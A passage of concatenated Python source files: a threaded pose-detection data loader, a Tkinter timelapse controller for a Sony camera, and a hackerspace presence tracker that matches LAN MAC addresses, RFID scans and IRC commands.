        t.daemon = True
        t.start()
        return self
    def update(self):
        # keep looping the whole dataset
        while True:
            with torch.no_grad():
                (orig_img, im_name, boxes, scores, inps, pt1, pt2) = self.detectionLoader.read()
                # drop stale detections so we always process the newest frame.
                # NOTE(review): bypasses the Queue API via CPython internals.
                with self.detectionLoader.Q.mutex:
                    self.detectionLoader.Q.queue.clear()
                if boxes is None or boxes.nelement() == 0:
                    # nothing detected: forward an empty record downstream
                    while self.Q.full():
                        time.sleep(0.2)
                    self.Q.put((None, orig_img, im_name, boxes, scores, None, None))
                    continue
                # pose network expects RGB; OpenCV frames are BGR
                inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
                inps, pt1, pt2 = crop_from_dets(inp, boxes, inps, pt1, pt2)
                while self.Q.full():
                    time.sleep(0.2)
                self.Q.put((inps, orig_img, im_name, boxes, scores, pt1, pt2))
    def read(self):
        # return next processed tuple from the queue (blocks when empty)
        return self.Q.get()
    def len(self):
        # return queue len
        return self.Q.qsize()
class WebcamDetectionLoader:
    """Threaded webcam capture + YOLOv3-SPP detection in a single stage.

    Unlike DetectionLoader, when the queue is full this loader clears it and
    keeps the newest result (real-time behavior) instead of sleeping.
    """
    def __init__(self, webcam=0, batchSize=1, queueSize=256):
        # load the detector and pin its input resolution to opt.inp_dim
        self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
        self.det_model.load_weights('models/yolo/yolov3-spp.weights')
        self.det_model.net_info['height'] = opt.inp_dim
        self.det_inp_dim = int(self.det_model.net_info['height'])
        # YOLO's input side must be a positive multiple of its 32-px stride
        assert self.det_inp_dim % 32 == 0
        assert self.det_inp_dim > 32
        self.det_model.cuda()
        self.det_model.eval()
        self.stream = cv2.VideoCapture(int(webcam))
        assert self.stream.isOpened(), 'Cannot open webcam'
        # flag used to indicate if the thread should be stopped or not
        self.stopped = False
        self.batchSize = batchSize
        # LIFO queue of (inp, orig_img, boxes, scores) tuples
        self.Q = LifoQueue(maxsize=queueSize)
    def len(self):
        # current number of queued results
        return self.Q.qsize()
    def start(self):
        # start a daemon thread (dies with the main process) running update()
        t = Thread(target=self.update, args=())
        t.daemon = True
        t.start()
        return self
    def update(self):
        # keep looping
        while True:
            img = []
            inp = []
            orig_img = []
            im_name = []
            im_dim_list = []
            for k in range(self.batchSize):
                (grabbed, frame) = self.stream.read()
                if not grabbed:
                    continue
                # process and add the frame to the batch
                inp_dim = int(opt.inp_dim)
                img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
                inp_k = im_to_torch(orig_img_k)
                img.append(img_k)
                inp.append(inp_k)
                orig_img.append(orig_img_k)
                im_dim_list.append(im_dim_list_k)
            with torch.no_grad():
                # NOTE(review): if no frame was grabbed this iteration, inp is
                # empty and inp[0] raises IndexError — confirm the capture
                # always delivers frames. ht/wd are also unused below.
                ht = inp[0].size(1)
                wd = inp[0].size(2)
                # Human Detection
                img = Variable(torch.cat(img)).cuda()
                im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
                im_dim_list = im_dim_list.cuda()
                prediction = self.det_model(img, CUDA=True)
                # NMS process
                dets = dynamic_write_results(prediction, opt.confidence,
                                             opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
                if isinstance(dets, int) or dets.shape[0] == 0:
                    # no detections: emit frames with empty results
                    for k in range(len(inp)):
                        if self.Q.full():
                            # drop backlog, keep real-time
                            with self.Q.mutex:
                                self.Q.queue.clear()
                        self.Q.put((inp[k], orig_img[k], None, None))
                    continue
                # dets column 0 is the batch index of each detection
                im_dim_list = torch.index_select(im_dim_list, 0, dets[:, 0].long())
                scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
                # coordinate transfer: undo letterbox padding, then rescale
                dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
                dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
                dets[:, 1:5] /= scaling_factor
                for j in range(dets.shape[0]):
                    # clamp boxes to the original image bounds
                    dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
                    dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
                boxes = dets[:, 1:5].cpu()
                scores = dets[:, 5:6].cpu()
                for k in range(len(inp)):
                    if self.Q.full():
                        # drop backlog, keep real-time
                        with self.Q.mutex:
                            self.Q.queue.clear()
                    self.Q.put((inp[k], orig_img[k], boxes[dets[:, 0] == k], scores[dets[:, 0] == k]))
    def videoinfo(self):
        # indicate the video info: (fourcc, fps, (width, height))
        fourcc = int(self.stream.get(cv2.CAP_PROP_FOURCC))
        fps = self.stream.get(cv2.CAP_PROP_FPS)
        frameSize = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)), int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
        return (fourcc, fps, frameSize)
    def read(self):
        # return next result tuple from the queue (blocks when empty)
        return self.Q.get()
    def more(self):
        # return True if there are still frames in the queue
        return self.Q.qsize() > 0
    def stop(self):
        # indicate that the thread should be stopped
        # NOTE(review): update() never checks this flag; the daemon thread
        # only ends when the process exits
        self.stopped = True
class DataWriter:
    """Consumer thread that renders pose results and optionally shows,
    saves as images, and/or writes them to a video file."""
    def __init__(self, save_video=False,
                 savepath='examples/res/1.avi', fourcc=cv2.VideoWriter_fourcc(*'XVID'), fps=25, frameSize=(640, 480),
                 queueSize=1024):
        if save_video:
            # self.stream only exists when save_video is True; stop()/update()
            # guard on self.save_video before touching it
            self.stream = cv2.VideoWriter(savepath, fourcc, fps, frameSize)
            assert self.stream.isOpened(), 'Cannot open video for writing'
        self.save_video = save_video
        # flag used to indicate if the thread should be stopped or not
        self.stopped = False
        # accumulated per-frame pose results, returned by results()
        self.final_result = []
        # FIFO queue of frames pending rendering/writing
        self.Q = Queue(maxsize=queueSize)
        if opt.save_img:
            # NOTE(review): os.mkdir fails if opt.outputpath itself is
            # missing — presumably created earlier; confirm
            if not os.path.exists(opt.outputpath + '/vis'):
                os.mkdir(opt.outputpath + '/vis')
    def start(self):
        # start a daemon thread (dies with the main process) running update()
        t = Thread(target=self.update, args=())
        t.daemon = True
        t.start()
        return self
    def update(self):
        # keep looping infinitely
        while True:
            # if the thread indicator variable is set, stop the
            # thread (releasing the video writer if we own one)
            if self.stopped:
                if self.save_video:
                    self.stream.release()
                return
            # otherwise, ensure the queue is not empty
            if not self.Q.empty():
                (boxes, scores, hm_data, pt1, pt2, orig_img, im_name) = self.Q.get()
                orig_img = np.array(orig_img, dtype=np.uint8)
                if boxes is None:
                    # no detections: output the raw frame unchanged
                    if opt.save_img or opt.save_video or opt.vis:
                        img = orig_img
                        if opt.vis:
                            cv2.imshow("AlphaPose Demo", img)
                            cv2.waitKey(30)
                        if opt.save_img:
                            cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
                        if opt.save_video:
                            self.stream.write(img)
                else:
                    # location prediction (n, kp, 2) | score prediction (n, kp, 1)
                    preds_hm, preds_img, preds_scores = getPrediction(
                        hm_data, pt1, pt2, opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
                    # pose-level NMS merges overlapping skeletons
                    result = pose_nms(boxes, scores, preds_img, preds_scores)
                    result = {
                        'imgname': im_name,
                        'result': result
                    }
                    self.final_result.append(result)
                    if opt.save_img or opt.save_video or opt.vis:
                        img = vis_frame(orig_img, result)
                        if opt.vis:
                            cv2.imshow("AlphaPose Demo", img)
                            cv2.waitKey(30)
                        if opt.save_img:
                            cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
                        if opt.save_video:
                            self.stream.write(img)
            else:
                # queue empty: back off briefly instead of busy-waiting
                time.sleep(0.1)
    def running(self):
        # indicate whether there is still work queued (small grace sleep)
        time.sleep(0.2)
        return not self.Q.empty()
    def save(self, boxes, scores, hm_data, pt1, pt2, orig_img, im_name):
        # enqueue one frame's data for rendering (blocks when the queue is full)
        self.Q.put((boxes, scores, hm_data, pt1, pt2, orig_img, im_name))
    def stop(self):
        # indicate that the thread should be stopped; the sleep gives
        # update() a chance to drain/release before callers proceed
        self.stopped = True
        time.sleep(0.2)
    def results(self):
        # return final accumulated pose results
        return self.final_result
    def len(self):
        # return queue len
        return self.Q.qsize()
class Mscoco(data.Dataset):
    """Skeleton COCO-person dataset wrapper holding joint-layout constants.

    __getitem__/__len__ are stubs; instances only expose configuration used
    by the pose pipeline (resolutions, joint counts, flip pairs).
    """

    def __init__(self, train=True, sigma=1,
                 scale_factor=(0.2, 0.3), rot_factor=40, label_type='Gaussian'):
        self.img_folder = '../data/coco/images'  # root image folder
        self.is_train = train                    # training set or test set
        # network input / output resolutions come from the global options
        self.inputResH, self.inputResW = opt.inputResH, opt.inputResW
        self.outputResH, self.outputResW = opt.outputResH, opt.outputResW
        # augmentation / target-generation settings
        self.sigma = sigma
        self.scale_factor = scale_factor
        self.rot_factor = rot_factor
        self.label_type = label_type
        # joint counts: 17 COCO keypoints + 16 MPII keypoints
        self.nJoints_coco = 17
        self.nJoints_mpii = 16
        self.nJoints = 33
        # 1-based joint indices used for accuracy evaluation (1..17)
        self.accIdxs = tuple(range(1, 18))
        # left/right keypoint pairs swapped on horizontal flip
        self.flipRef = ((2, 3), (4, 5), (6, 7),
                        (8, 9), (10, 11), (12, 13),
                        (14, 15), (16, 17))

    def __getitem__(self, index):
        pass

    def __len__(self):
        pass
def crop_from_dets(img, boxes, inps, pt1, pt2):
    """Crop each detected person out of the original image.

    img: CHW image tensor; boxes: per-person (x1, y1, x2, y2) boxes;
    inps/pt1/pt2: pre-allocated output buffers filled in place.
    Returns the filled (inps, pt1, pt2).

    NOTE(review): `tmp_img = img` aliases the input, so the channel-mean
    subtraction below mutates the caller's tensor in place — presumably
    intentional to avoid a copy, but confirm callers expect this.
    """
    imght = img.size(1)
    imgwidth = img.size(2)
    tmp_img = img
    # per-channel mean subtraction (values taken as-is from the model's
    # training setup; they differ from the usual ImageNet means — TODO confirm)
    tmp_img[0].add_(-0.406)
    tmp_img[1].add_(-0.457)
    tmp_img[2].add_(-0.480)
    for i, box in enumerate(boxes):
        upLeft = torch.Tensor(
            (float(box[0]), float(box[1])))
        bottomRight = torch.Tensor(
            (float(box[2]), float(box[3])))
        ht = bottomRight[1] - upLeft[1]
        width = bottomRight[0] - upLeft[0]
        # pad narrow boxes proportionally more before cropping
        if width > 100:
            scaleRate = 0.2
        else:
            scaleRate = 0.3
        # expand the box by scaleRate, clamped to the image bounds,
        # while keeping at least a 5-px extent in each direction
        upLeft[0] = max(0, upLeft[0] - width * scaleRate / 2)
        upLeft[1] = max(0, upLeft[1] - ht * scaleRate / 2)
        bottomRight[0] = max(
            min(imgwidth - 1, bottomRight[0] + width * scaleRate / 2), upLeft[0] + 5)
        bottomRight[1] = max(
            min(imght - 1, bottomRight[1] + ht * scaleRate / 2), upLeft[1] + 5)
        inps[i] = cropBox(tmp_img.clone(), upLeft, bottomRight, opt.inputResH, opt.inputResW)
        pt1[i] = upLeft
        pt2[i] = bottomRight
    return inps, pt1, pt2
|
pylapse.py | import libsonyapi
from libsonyapi.actions import Actions
from libsonyapi.camera import Camera, ConnectionError
import tkinter as tk
from tkinter import messagebox
import threading
import time
import datetime
import os
pylapse_font = ("Trebuchet", 14)
class CustomLabel(tk.Label):
    """A tk.Label preconfigured with the shared pylapse font and auto-packed
    into its parent; used throughout pylapse."""

    def __init__(self, parent, **kwargs):
        super().__init__(parent, **kwargs)
        self.config(font=pylapse_font)
        self.pack()
class PyLapse(tk.Tk):
    """Root window of pylapse; a MainScreen frame is placed inside it."""

    def __init__(self):
        super().__init__()
        self.title("PyLapse")
class MainScreen(tk.Frame):
    """
    MainScreen frame of pylapse; placed in the pylapse root window.

    Holds the live-view/camera-connection section and the timelapse
    settings/info section, and drives the timelapse itself.
    """

    def __init__(self, parent):
        """Place the live view and timelapse frames."""
        tk.Frame.__init__(self, parent)
        tk.Label(self, text="PyLapse", font=("Trebuchet", 20)).grid(row=1)
        self.set_live_view()
        self.set_timelapse_frame()

    def set_live_view(self):
        """Build the live-view section (camera connect button + status)."""
        # TODO: implement live view, scrap controls,
        live_view_frame = tk.Frame(self)
        live_view_frame.grid(row=2)
        live_view = tk.Frame(live_view_frame)
        live_view.grid(row=1, column=1)
        # CustomLabel(live_view, text = 'live view')
        live_view_controls_frame = tk.Frame(live_view_frame)
        live_view_controls_frame.grid(row=1, column=2)
        # CustomLabel(live_view_controls_frame, text = 'controls')
        self.camera_connect_button = tk.Button(
            live_view_frame,
            text="Connect to camera",
            font=pylapse_font,
            command=self.connect_to_camera,
        )
        self.camera_connect_button.grid(row=2, column=1, columnspan=2)
        self.camera_connection_status = tk.Label(live_view_frame, font=pylapse_font)
        self.camera_connection_status.grid(row=3, column=1, columnspan=2)

    def set_timelapse_frame(self):
        """Build the timelapse settings (fps, interval, duration) and info widgets."""
        timelapse_frame = tk.Frame(self)
        timelapse_frame.grid(row=3)
        timelapse_settings_frame = tk.Frame(timelapse_frame)
        timelapse_settings_frame.grid(row=1, column=1)
        CustomLabel(timelapse_settings_frame, text="TIMELAPSE SETTINGS")
        CustomLabel(timelapse_settings_frame, text="FPS")
        self.fps_scale = tk.Scale(
            timelapse_settings_frame,
            orient=tk.HORIZONTAL,
            from_=0,
            to=60,
            sliderlength=10,
            length=150,
            tickinterval=10,
            command=self.update_timelapse_info,
        )
        self.fps_scale.pack()
        self.fps_scale.set(24)
        CustomLabel(timelapse_settings_frame, text="Interval\n(max:10min 59sec)")
        interval_frame = tk.Frame(timelapse_settings_frame, pady=5)
        interval_frame.pack()
        self.min_between_shots = tk.Spinbox(
            interval_frame,
            from_=0,
            to=10,
            width=2,
            font=pylapse_font,
            command=self.update_timelapse_info,
        )
        self.min_between_shots.grid(row=1, column=1)
        min_label = tk.Label(interval_frame, text="min", font=pylapse_font)
        min_label.grid(row=1, column=2)
        self.sec_between_shot = tk.Spinbox(
            interval_frame,
            from_=0,
            to=59,
            width=2,
            font=pylapse_font,
            command=self.update_timelapse_info,
        )
        self.sec_between_shot.grid(row=1, column=3)
        # default interval: 5 seconds
        self.sec_between_shot.delete(0)
        self.sec_between_shot.insert(0, 5)
        sec_label = tk.Label(interval_frame, text="sec", font=pylapse_font)
        sec_label.grid(row=1, column=4)
        timelapse_duration_label = CustomLabel(
            timelapse_settings_frame, text="Timelapse Duration"
        )
        timelapse_duration_frame = tk.Frame(timelapse_settings_frame)
        timelapse_duration_frame.pack()
        self.timelapse_duration_min = tk.Spinbox(
            timelapse_duration_frame,
            from_=0,
            to=99,
            width=2,
            font=pylapse_font,
            command=self.update_timelapse_info,
        )
        self.timelapse_duration_min.grid(row=1, column=1)
        timelapse_duration_min_label = tk.Label(
            timelapse_duration_frame, text="min", font=pylapse_font
        )
        timelapse_duration_min_label.grid(row=1, column=2)
        self.timelapse_duration_sec = tk.Spinbox(
            timelapse_duration_frame,
            from_=0,
            to=59,
            width=2,
            font=pylapse_font,
            command=self.update_timelapse_info,
        )
        self.timelapse_duration_sec.grid(row=1, column=3)
        # default output length: 10 seconds
        self.timelapse_duration_sec.delete(0)
        self.timelapse_duration_sec.insert(0, 10)
        timelapse_duration_sec_label = tk.Label(
            timelapse_duration_frame, text="sec", font=pylapse_font
        )
        timelapse_duration_sec_label.grid(row=1, column=4)
        timelapse_info_frame = tk.Frame(timelapse_frame)
        timelapse_info_frame.grid(row=1, column=2)
        CustomLabel(timelapse_info_frame, text="TIMELAPSE INFO")
        self.total_shots = CustomLabel(
            timelapse_info_frame, text="Total Amount of Shots: ", pady=35
        )
        self.shoot_duration = CustomLabel(
            timelapse_info_frame, text="Total Shooting Time: ", pady=35
        )
        self.update_timelapse_info()
        start_button = tk.Button(
            self, text="START TIMELAPSE", font=pylapse_font, command=self.confirm
        )
        start_button.grid(row=4)

    def connect_to_camera(self):
        """Attempt a connection to the Sony camera and update the status label."""
        try:
            self.camera_connection_status.config(text="Connecting to camera...")
            self.camera = Camera()
            self.camera.do(Actions.startRecMode)
            self.camera_connection_status.config(
                text="Successfully connected to " + self.camera.name
            )
            self.camera_connect_button.grid_forget()
        except ConnectionError:
            self.camera_connection_status.config(text="Connection to camera failed")

    def get_params(self):
        """Read the current user input of MainScreen.

        Returns (fps, mins, secs, timelapse_duration, total_interval_in_sec,
        total_shots, shoot_duration); durations are in seconds.
        """
        fps = int(self.fps_scale.get())
        # FIX: renamed locals from `min`/`sec` — `min` shadowed the builtin
        mins = int(self.min_between_shots.get())
        secs = int(self.sec_between_shot.get())
        timelapse_duration = int(self.timelapse_duration_min.get()) * 60 + int(
            self.timelapse_duration_sec.get()
        )
        total_interval_in_sec = mins * 60 + secs
        total_shots = timelapse_duration * fps
        shoot_duration = total_shots * total_interval_in_sec
        return (
            fps,
            mins,
            secs,
            timelapse_duration,
            total_interval_in_sec,
            total_shots,
            shoot_duration,
        )

    def update_timelapse_info(self, event=None):
        """Recalculate and display shot count / shooting time.

        Called whenever the user changes fps, duration, or interval.
        """
        (
            fps,
            mins,
            secs,
            timelapse_duration,
            total_interval_in_sec,
            total_shots,
            shoot_duration,
        ) = self.get_params()
        self.total_shots.config(
            text="Total Amount of Shots:\n" + str(total_shots) + " shots"
        )
        self.shoot_duration.config(
            text="Total Shooting Time:\n"
            + str(shoot_duration // 60)  # FIX: floor division, no float round-trip
            + " min "
            + str(shoot_duration % 60)
            + " sec"
        )

    def confirm(self):
        """Show a confirmation box; on yes, start the timelapse and its
        progress window. Does nothing on no."""
        # FIX: guard against starting without a connected camera — previously
        # the worker thread crashed with AttributeError on self.camera
        if not hasattr(self, "camera"):
            messagebox.showerror(
                "No camera", "Connect to a camera before starting a timelapse."
            )
            return
        (
            fps,
            mins,
            secs,
            timelapse_duration,
            total_interval_in_sec,
            total_shots,
            shoot_duration,
        ) = self.get_params()
        confirm_box = messagebox.askyesno(
            "Start timelapse??",
            "Do you want to start a timelapse with the following settings:\n\n"
            + str(fps)
            + " FPS with a "
            + str(mins)
            + " min "
            + str(secs)
            + " sec interval"
            + ", which will make a "
            + str(timelapse_duration)
            + " second long timelapse\n\n"
            + "This timelapse will consist of "
            + str(total_shots)
            + " shots and will require "
            + str(shoot_duration // 60)
            + " min "
            + str(shoot_duration % 60)
            + " sec of total shooting time\n\n"
            + "Make sure you have set your camera to the desired settings!",
        )
        if confirm_box:  # FIX: was `== True`
            # initiate timelapse worker thread
            timelapse = threading.Thread(
                target=self.start_timelapse, args=(total_interval_in_sec, total_shots)
            )
            timelapse.daemon = True
            timelapse.start()
            # init timelapse progress window
            top = tk.Toplevel(width=1000)
            top.title("Timelapse in progress...")  # FIX: typo "Timelape"
            self.start_time = datetime.datetime.now()
            self.end_time = self.start_time + datetime.timedelta(seconds=shoot_duration)
            self.progress_label = CustomLabel(top, text="Timelapse in progress...")
            self.shot_count = CustomLabel(top)
            self.percent_done = CustomLabel(top)
            CustomLabel(top, text="-" * 10)
            self.time_elapsed = CustomLabel(top)
            time_started = CustomLabel(
                top, text="Time Started: " + self.start_time.strftime("%I:%M")
            )
            estimate_complete = CustomLabel(
                top,
                text="Estimated Time Completion: " + self.end_time.strftime("%I:%M"),
            )

            def stop_timelapse():
                # cooperative cancel: the worker checks self.isrunning each shot
                self.isrunning = False
                top.destroy()

            self.cancel_button = tk.Button(
                top, text="Cancel Timelapse", font=pylapse_font, command=stop_timelapse
            )
            self.cancel_button.pack()
            self.refresh_info_toplevel(
                total_interval_in_sec, total_shots, shoot_duration
            )
            top.mainloop()

    def start_timelapse(self, interval_in_sec, total_shots):
        """Worker-thread body: take `total_shots` photos, sleeping
        `interval_in_sec` between shots; honors cancellation via isrunning."""
        self.shots_taken = 0
        self.isrunning = True
        while self.shots_taken != total_shots and self.isrunning:
            self.camera.do(Actions.actTakePicture)
            time.sleep(interval_in_sec)
            self.shots_taken += 1
        self.isrunning = False

    def refresh_info_toplevel(self, interval_in_sec, total_shots, shoot_duration):
        """Refresh the progress window once a second until the timelapse
        completes or is cancelled. Note: re-reads the current UI values."""
        if self.shots_taken < total_shots and self.isrunning:
            (
                fps,
                mins,
                secs,
                timelapse_duration,
                total_interval_in_sec,
                total_shots,
                shoot_duration,
            ) = self.get_params()
            self.shot_count.config(
                text="Shots: " + str(self.shots_taken + 1) + "/" + str(total_shots)
            )
            self.percent_done.config(
                text="Percent Completed: "
                + (str(int(((self.shots_taken + 1) / total_shots) * 100)) + "%")
            )
            self.time_elapsed.config(
                text="Time Elapsed: "
                + str(datetime.datetime.now() - self.start_time).split(".")[0]
            )
            self.after(
                1000,
                self.refresh_info_toplevel,
                total_interval_in_sec,
                total_shots,
                shoot_duration,
            )
        elif self.shots_taken == total_shots and not self.isrunning:
            self.progress_label.config(text="TIMELAPSE COMPLETED!!")
            self.cancel_button.pack_forget()
if __name__ == "__main__":

    def resource_path(relative_path):
        """Get absolute path to resource, works for dev and for PyInstaller."""
        # FIX: `sys` was never imported, so sys._MEIPASS raised NameError and
        # only worked because the broad except swallowed it. Import locally
        # and catch the specific "not frozen" case.
        import sys
        try:
            # PyInstaller creates a temp folder and stores its path in _MEIPASS
            base_path = sys._MEIPASS
        except AttributeError:
            base_path = os.path.abspath(".")
        return os.path.join(base_path, relative_path)

    # place MainScreen in the pylapse root window and start the mainloop
    root = PyLapse()
    # raw string: `\p` is an invalid escape sequence in a normal literal
    # (same runtime value, no DeprecationWarning)
    root.iconbitmap(resource_path(r"releases\pylapse.ico"))
    MainScreen(root).pack()
    root.mainloop()
|
mac_kicker.py | #!/usr/bin/env python3
#
# MIT
# ciko@afra-berlin.de
# kookie@spacekookie.de
import asyncio
import datetime
import subprocess
import sys
import time
import threading
import evdev
import hashlib
import pydle
import requests
from rpi_ws281x import *
def mac_tester():
    """Background worker: every 60s, reload the MAC registry, nmap-scan the
    LAN for registered devices, and rebuild current_mac_users. If the space
    door reports LOCKED, clear the RFID and IRC presence lists too.
    """
    # FIX: current_irc_users was missing from the global declaration, so the
    # door-locked branch rebound a local and never actually cleared IRC users.
    global current_mac_users, current_rfid_users, current_irc_users
    while True:
        # Load the MACs inside the loop so edits to the file are auto-reloaded
        macs = {}
        with open("registered_macs", "r") as f:
            for line in f.readlines():
                if len(line.strip()) >= 2:
                    macs[line.split()[0].upper()] = line.split()[1]
        # Scan for all MACs in the current network
        scan_result = subprocess.check_output(
            ["nmap", "-sPn", "172.23.42.1-254"], universal_newlines=True)
        current_mac_users = []
        for line in scan_result.split("\n"):
            words = line.split()
            # FIX: the guard was `>= 2` but words[2] is read below;
            # a two-word "MAC ..." line would have raised IndexError
            if len(words) >= 3:
                if words[0] == "MAC":
                    mac_address = words[2].upper()
                    if mac_address in macs:
                        current_mac_users.append(macs[mac_address])
        current_mac_users = list(set(current_mac_users))  # don't duplicate users
        # If the door is closed, log out all RFID and IRC users
        try:
            if "LOCKED" in requests.get("http://door:8080/").text:
                current_rfid_users = []
                current_irc_users = []
        except Exception:
            pass  # ignore if the door service is dead (best-effort)
        time.sleep(60)
def find_rfid_user(authcode):
    """Look up the user registered for an RFID auth code.

    The registry file stores one "SHA224HEX username" pair per line; the
    scanned code is hashed before comparison. Returns the username, or
    None when the code is unknown.
    """
    digest = hashlib.sha224(authcode.encode()).hexdigest().upper()
    with open("registered_rfid", "r") as registry:
        for entry in registry:
            fields = entry.split()
            if len(fields) >= 2 and fields[0].upper() == digest:
                return fields[1]
    return None
def rfid_watcher():
    """Background worker: read digit sequences from the USB RFID reader
    (which presents itself as a keyboard) and toggle the scanned user's
    presence in current_rfid_users."""
    global current_rfid_users
    rfid_reader = evdev.InputDevice('/dev/input/event0')
    print("Connected to RFID Reader")
    current_code = ""
    # maps evdev key codes to characters; 'X' marks codes we ignore
    keys = "XX1234567890XXXXqwertzuiopXXXXasdfghjklXXXXXyxcvbnmXXXXXXXXXXXXXXXXXXXXXXX"
    # Read the keys
    for event in rfid_reader.read_loop():
        if event.type == 1 and event.value == 1:  # keyboard key-down events
            # NOTE(review): guard permits event.code == len(keys), which would
            # raise IndexError on keys[event.code] — presumably should be >=
            if event.code > len(keys):
                continue
            if keys[event.code] in "0123456789":
                # accumulate digits until a non-digit key (the reader's
                # trailing Enter) terminates the code
                current_code += keys[event.code]
            else:
                rfid_user = find_rfid_user(current_code)
                if not rfid_user:
                    # NOTE(review): current_code is not reset here, so an
                    # unknown scan's digits leak into the next code — confirm
                    continue
                if rfid_user in current_rfid_users:
                    # second scan of the same token logs the user out
                    current_rfid_users.remove(rfid_user)
                    color_rotate(Color(255, 0, 0))
                    speak("Goodbye {}".format(rfid_user))
                else:
                    current_rfid_users.append(rfid_user)
                    color_rotate(Color(0, 255, 0))
                    speak("Welcome {}".format(rfid_user))
                current_code = ""
def register_here(nick):
    """Mark an IRC user as present; announce with green LEDs and speech.

    No-op if the nick is already registered.
    """
    global current_irc_users
    if nick in current_irc_users:
        return
    current_irc_users.append(nick)
    color_rotate(Color(0, 255, 0))
    speak("Welcome {}".format(nick))
def register_gone(nick):
    """Mark an IRC user as gone; announce with red LEDs and speech.

    No-op if the nick is not currently registered.
    """
    global current_irc_users
    if nick not in current_irc_users:
        return
    current_irc_users.remove(nick)
    color_rotate(Color(255, 0, 0))
    speak("Goodbye {}".format(nick))
def speak(text):
    """Speak *text* asynchronously on a worker thread (non-blocking)."""
    worker = threading.Thread(target=t_speak, args=(text,))
    worker.start()
def t_speak(text):
    """Synthesize *text* with pico2wave and play it (blocking).

    Run via speak() to avoid blocking the caller.
    """
    # FIX: the text was previously wrapped in literal double quotes
    # ('"{}"'.format(text)); with an argument list (shell=False) the quotes
    # are passed to pico2wave verbatim and end up in the synthesized audio.
    subprocess.run(["pico2wave", "--lang", "en-US", "--wave", "/tmp/tts.wav", text])
    subprocess.run(["aplay", "-D", "plughw:CARD=Device,DEV=0", "/tmp/tts.wav"])
    subprocess.run(["rm", "/tmp/tts.wav"])
def register_eta(user, message):
    """Register an estimated arrival time from an IRC command.

    Accepted forms: ".eta 10min" (relative), ".eta 18:30" or ".eta 1830"
    (absolute, today's date). Stores the time in current_eta_users,
    announces it, and returns True; returns False on unparsable input.
    """
    global current_eta_users
    message_parts = message.split()
    if len(message_parts) != 2:
        return False  # skip invalid messages
    spec = message_parts[1]
    try:
        if "min" in spec:
            until_arrival = datetime.timedelta(minutes=int(spec.replace("min", "")))
            arrival_time = datetime.datetime.now() + until_arrival
        elif ":" in spec:
            parsed = datetime.datetime.strptime(spec, '%H:%M')
            arrival_time = datetime.datetime.now().replace(hour=parsed.hour,
                                                           minute=parsed.minute)
        else:
            parsed = datetime.datetime.strptime(spec, '%H%M')
            arrival_time = datetime.datetime.now().replace(hour=parsed.hour,
                                                           minute=parsed.minute)
            # FIX: removed a stray `arrival_time = datetime.datetime.now() +
            # until_arrival` here — `until_arrival` is undefined in this
            # branch (NameError) and it clobbered the value just computed.
    except (TypeError, ValueError):
        # FIX: bad %H:%M / %H%M input previously raised out of this function;
        # now it is reported as "not understood" like the other formats.
        return False
    # NOTE(review): an absolute time earlier than now lands in the past and
    # is dropped on the next get_formatted_eta_users() call — confirm intent.
    current_eta_users[user] = arrival_time
    speak("{} will arrive at {}".format(user, arrival_time.strftime("%H %M")))
    return True
def get_version():
    """Return the current git commit hash, or "<unknown>" when it cannot
    be determined (not a repo, or git missing)."""
    try:
        version = subprocess.check_output(["git", "rev-parse", "HEAD"])
        return version.decode('ascii').strip()
    except (subprocess.CalledProcessError, OSError):
        # FIX: bare `CalledProcessError` was a NameError (only `subprocess`
        # is imported), so any git failure crashed instead of degrading.
        # OSError also covers git not being installed.
        return "<unknown>"
def get_formatted_eta_users():
    """Return "user (HH:MM)" strings for pending ETAs, dropping expired ones.

    Side effect: removes entries from current_eta_users whose time has passed.
    """
    global current_eta_users
    now = datetime.datetime.now()
    # FIX: the original called current_eta_users.remove(user) — dicts have no
    # .remove (AttributeError) — and mutated the dict while iterating it
    # (RuntimeError). Collect expired keys first, delete afterwards.
    expired = [user for user, eta in current_eta_users.items() if eta < now]
    for user in expired:
        del current_eta_users[user]
    return ["{} ({})".format(user, eta.strftime("%H:%M"))
            for user, eta in current_eta_users.items()]
def self_register_mac(nick, message):
    """Handle ".register mac <MAC>": append "<MAC> <nick>" to the registry.

    Returns True on success, False for malformed commands or non-MAC values.
    """
    parts = message.split()
    if len(parts) != 3:
        return False  # skip invalid messages
    mac = parts[2]
    # a MAC is six colon-separated groups, 17 characters total
    if len(mac.split(":")) != 6 or len(mac) != 17:
        return False  # skip non-MACs
    with open("registered_macs", "a") as registry:
        registry.write("\n" + mac + " " + nick)
    return True
def self_remove_mac(nick, message):
    """Handle ".remove mac <MAC>": drop matching lines from the registry.

    Returns True on success, False for malformed commands or non-MAC values.
    """
    parts = message.split()
    if len(parts) != 3:
        return False  # skip invalid messages
    mac = parts[2]
    # a MAC is six colon-separated groups, 17 characters total
    if len(mac.split(":")) != 6 or len(mac) != 17:
        return False  # skip non-MACs
    with open("registered_macs", "r") as registry:
        existing_lines = registry.readlines()
    # rewrite the file, keeping every line that does not mention the MAC
    with open("registered_macs", "w") as registry:
        for entry in existing_lines:
            if mac.upper() not in entry.upper():
                registry.write(entry)
    return True
def color_rotate(colors, rotations=1):
    """Run the LED chase animation asynchronously on a worker thread."""
    animation = threading.Thread(target=t_color_rotate, args=(colors, rotations))
    animation.start()
def t_color_rotate(colors, rotations):
    """LED chase: light pixels one-by-one in `colors`, then clear them.

    Blocking (0.1s per pixel) — run via color_rotate().
    NOTE(review): `rotations` is accepted but never used; the clearing pass
    starts at pixel 1, so pixel 0 stays lit — confirm whether intentional.
    """
    # fill pass: light pixel i, dark the next slot (wrapping at LED_COUNT)
